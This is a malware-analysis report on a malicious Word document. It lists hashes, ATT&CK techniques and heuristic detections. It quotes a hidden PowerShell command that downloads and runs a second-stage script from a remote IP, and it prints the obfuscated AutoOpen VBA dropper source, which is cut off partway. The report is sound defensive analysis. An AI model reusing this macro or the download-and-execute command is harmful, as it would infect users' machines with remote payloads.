Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b94669b74ea10b34…

MALICIOUS

Office (OLE)

100.2 KB Created: 2018-07-05 09:33:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: 36e93c172f6945863414127265b7a706 SHA-1: 1f32f28b0a5bed4e6d9ebceda0b24198d7ff9b08 SHA-256: b94669b74ea10b348b3f74fb3236352bf715ec2be4916022d544ab24e26cce47
342 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a critical obfuscated auto-exec VBA loader with CreateObject and Shell calls, indicative of a dropper. The VBA script reconstructs and executes a PowerShell command: "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://185.189.255.100/a.ps1')\". This command downloads and executes a second-stage payload from the specified URL, confirming its role as a downloader.

Heuristics 9

  • ClamAV: Doc.Dropper.Agent-6602053-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6602053-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7582 bytes
SHA-256: d1aaae11ed324321dcdee5ba79717c1d6d683f8c393af0540a5b56c9c1f98fe8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "iIwBPoqiJJYi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   wGwrVj = (29273 / NcMdsf * 63999 / UjUfFK)
   dAVYY = (23985 / PzjfFP * 90995 / DWVzE)
   cvuks = (70482 / BJNDuM * 57042 / Ehujz)
   oWuAT = (68863 / ZlsAiO * 92825 / daSJl)
   HnJGm = (19196 / swEOb * 63576 / rzNSCt)
   SAnpcf = (83768 / LDaDwn * 22405 / qTIYSW)
ffXjNuT (ObiqhtNwYz + AlCkEW)
   JovRYA = (12553 / cwzwml * 31563 / iwVBls)
   RZMMEq = (47142 / dzRzbS * 7442 / uYoFH)
   SRobpc = (40618 / wZkNj * 72285 / zaTZu)
   QaSauG = (58262 / PMjAOO * 54485 / ijHwl)
End Sub


Attribute VB_Name = "uSAKVzYqUrIlz"
Function ObiqhtNwYz()
On Error Resume Next
dFWpLB = (10363 / KwtzBC)
   pidUG = (83329 / FSMVGv)
   BBKqiQ = (97441 / nksqml)
bZSlfYwil = "wers" + "hell    " + "         " + "     " + Chr(40) + Chr(40) + "21 ,99" + " , 75" + ",94,1" + "2 ,95 ,"
PzYuO = YwZsM + 67650 - (Gqwadu / qSLSw)
   dFVsoS = ksSYM + 87418 - (CXbTE / hrMGjB)
   lsOMnr = Vsudw + 42386 - (FzjGV / bBOjCH)
bIdoD = "84 , 70 ," + "28,9" + "4 ,83, 91" + " ,84" + " ,82" + " , 69 ,1" + "7 , 127" + ",84 ,"
iKfdkY = njdrO + 3159 - (DhioqD / jWjCh)
   oGzUim = LfZrw + 71209 - (DwfYLk / bLbJR)
   vWLNB = cVtOLM + 87859 - (QCjzi / YdzUbh)
fqKcDMvzip = "69, 31,1" + "02 ,84" + ", 83," + "114 ,93," + " 88 ," + " 84,9" + "5, 69,"
rmUHd = znIQBX + 12644 - (ClHXpq / rzXXjT)
   CMdEAu = Dvljnm + 20188 - (zKbrX / ZEjKal)
   owjzOD = EPzvU + 21931 - (tnqoA / XkPAT)
   waDvss = RiMbK + 66648 - (PcdJvS / CEwuo)
   EBDbl = srUjB + 80925 - (UMHXMi / TrXwa)
SLIqKiYnfq = "10,2" + "1 ,107 " + ", 103 " + ",112" + " ,12 ,2" + "2,89 , 6" + "9,69 , 6" + "5,11 ," + "30 ," + " 30 "
jddKPr = svakFw + 3890 - (BNuIn / YcNCc)
SEVjvPaW = ", 83 , " + "94,7" + "2 , 67," + "80 ,9" + "2, 94, " + "66 ,31 ,8" + "5,80,8"
PImjo = UQlGjA + 2071 - (mzkbor / aRBGX)
   ppqld = NHzFX + 93623 - (wzSru / VjKZn)
   aJzzOB = JbvYL + 32990 - (RmkbCZ / MqTQb)
   Sfinr = tTIpX + 35951 - (AAirC / Saqjp)
phTdzE = "6 , 66,31" + ", 68" + ",66 ," + " 30, 9" + "3 ,88,82," + "84, " + "95,66 ," + " 84,30 ,7" + "5,75 " + ",94,68 ," + "69 , 31 ," + "84 ,7"
iPDbZS = TVJivj + 63549 - (pVizQc / ijPKV)
   TncwtA = PEdWL + 11975 - (ECvGu / cUHzol)
   dIHkmk = aumnKk + 63135 - (cwJvbS / FozJWk)
RIzUwsiVAAz = "3, 84,11" + "3,89 ," + "69, 6" + "9,65,11 " + ", 30 ," + "30, 87, " + "93 ," + "94,6" + "8 ,6" + "7 , 88,6" + "6 ,89 ,87" + ", 67,"
zwosA = LzwDP + 50727 - (KFrbsE / AaWNz)
tqiutRYP = " 80, 86" + " ,67 , 8" + "0,95" + ", 82,84" + ",31,88 ," + " 95 , 30," + "70, 65,28" + " ,82" + " ,94 , " + "95,69,84" + ",95 , 69 " + ", 30"
atzEa = izLsY + 38466 - (vnGwcn / wKvuoq)
   cOEDiX = OwolFn + 24336 - (YDDIiu / usSwO)
AcPvoavbDMK = " , 68 , 6" + "5, 9" + "3 , 9" + "4,80 ,8" + "5 ,66 ,3" + "0, 75" + ",75 ," + "94, 68,69"
ObiqhtNwYz = bZSlfYwil + bIdoD + fqKcDMvzip + SLIqKiYnfq + SEVjvPaW + phTdzE + RIzUwsiVAAz + tqiutRYP + AcPvoavbDMK
   QzDPkJ = nbGQA + 2950 - (sSwQvK / SkKin)
   zIvOBm = Gkszi + 27331 - (ZFPkjO / UkHPTb)
   CzMslz = CMKoj + 56078 - (VuhNnM / mCfqV)
   klITp = voAMs + 31711 - (rLjKD / HlTTb)
   aQRhX = Ezlkc + 67481 - (mPETJ / wPSVD)
End Function
Function AlCkEW()
On Error Resume Next
whKuLD = jTlsVq + 79580 - (plLKv / GVRDzQ)
   BPLcFE = ahqcO + 19060 - (OIzKMz / GpXRc)
   oKdhbb = fhCGw + 58240 - (MRrGaD / mFRcur)
IamVKB = ", 31 , 8" + "4, 73" + ",84, " + "22 , 31," + " 98,65" + ",93 ," + "88 , " + "69 ,25 " + ", 22,11" + "3,22, 24,"
OmvJia = oPNCJ + 7327 - (EwPQJ / LqqrbC)
oWbzQ = " 10 ,2" + "1 ,87" + ",70 ," + " 97 " + ", 17 , 1" + "2,17 " + ", 22" + " ,8,"
hcVDj = dOXOUl + 86494 - (FXzHwc / lUHwZB)
   jjomp = TDVLlC + 7059 - (NBpizN / fbCujX)
ZEWbNj = " 4 , " + "9 ,22" + ",10,21 ," + "64 ,90, " + "85, 12," + " 21, 84 ," + " 95, 71" + ",11 "
JRWwni = wUJjm + 34310 - (dcmlV / wYYUOw)
rjUsUp = ",69 ,84 " + ", 92 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.